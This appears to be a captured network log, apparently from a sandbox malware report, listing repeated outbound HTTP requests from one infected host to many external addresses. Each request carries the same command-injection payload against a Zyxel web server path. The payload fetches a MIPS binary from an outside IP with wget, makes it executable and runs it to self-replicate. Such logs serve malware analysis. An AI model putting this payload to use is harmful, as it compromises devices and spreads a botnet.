                                                Jan 29, 2024 07:08:08.754995108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9586192.168.2.2359130160.155.138.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.755050898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9587192.168.2.234190257.19.249.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.755086899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9588192.168.2.2344802164.185.204.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.755110979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9589192.168.2.234322476.199.206.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.758562088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9590192.168.2.2355634165.168.215.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.758584976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9591192.168.2.235729862.100.46.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.758629084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9592192.168.2.235633053.133.135.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.758681059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9593192.168.2.233602280.21.38.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.758733034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9594192.168.2.235342679.194.73.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.758778095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9595192.168.2.233539437.127.206.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.758830070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9596192.168.2.2333382167.14.151.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.758883953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9597192.168.2.233958264.8.147.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.758933067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9598192.168.2.235539886.210.232.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.758960009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9599192.168.2.2332944111.202.112.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.758999109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9600192.168.2.235227898.156.195.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.759049892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9601192.168.2.234160687.206.239.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.759073019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9602192.168.2.2344626101.227.213.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.759114981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9603192.168.2.233715238.107.169.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.759154081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9604192.168.2.2346498210.100.122.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.759154081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9605192.168.2.2335422164.45.155.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.759202003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9606192.168.2.2349358128.119.84.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.759222984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9607192.168.2.236036685.164.93.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.759285927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9608192.168.2.234468649.188.226.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.759349108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9609192.168.2.234231886.108.175.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.759388924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9610192.168.2.234410090.96.226.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.759443045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9611192.168.2.234917897.103.164.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.759488106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9612192.168.2.236032679.33.160.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.768639088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9613192.168.2.2345414190.63.170.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.768667936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9614192.168.2.2337348143.231.193.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.768707037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9615192.168.2.2333780180.157.13.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.768786907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9616192.168.2.233629469.69.57.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.768826962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9617192.168.2.2357896142.86.57.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.768870115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9618192.168.2.234563861.168.63.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.768899918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9619192.168.2.234519881.113.165.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.768935919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9620192.168.2.235182672.153.167.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.768960953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9621192.168.2.23364849.1.209.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.768992901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9622192.168.2.2342470222.115.114.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769037008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9623192.168.2.2342700129.101.226.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769081116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9624192.168.2.2335896168.154.16.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769102097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9625192.168.2.2348380207.195.95.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769140959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9626192.168.2.234003457.217.205.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769171953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9627192.168.2.2357584173.120.33.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769215107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9628192.168.2.234262094.159.82.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769248009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9629192.168.2.234618877.93.15.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769284010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9630192.168.2.2357644161.1.106.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769332886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9631192.168.2.2350416172.243.216.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769376993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9632192.168.2.2352180181.29.167.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769440889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9633192.168.2.2350218199.215.124.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769468069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9634192.168.2.2357094138.128.246.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769498110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9635192.168.2.2339368180.31.68.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769547939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9636192.168.2.2352592201.123.150.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769601107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9637192.168.2.235369898.2.246.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769653082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9638192.168.2.233481246.23.249.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769695044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9639192.168.2.2357496105.131.93.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769733906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9640192.168.2.2338828190.45.233.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769776106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9641192.168.2.2351788136.250.193.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769831896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9642192.168.2.2353906124.109.29.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769855976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9643192.168.2.235392443.169.101.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769906044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9644192.168.2.2349038216.231.191.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769933939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9645192.168.2.2357318156.65.97.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.769978046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9646192.168.2.2338744207.164.241.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770030022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9647192.168.2.2359794180.214.101.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770081997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9648192.168.2.2350848208.17.34.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770111084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9649192.168.2.2352382202.6.217.245443
                                                TimestampBytes transferredDirectionData
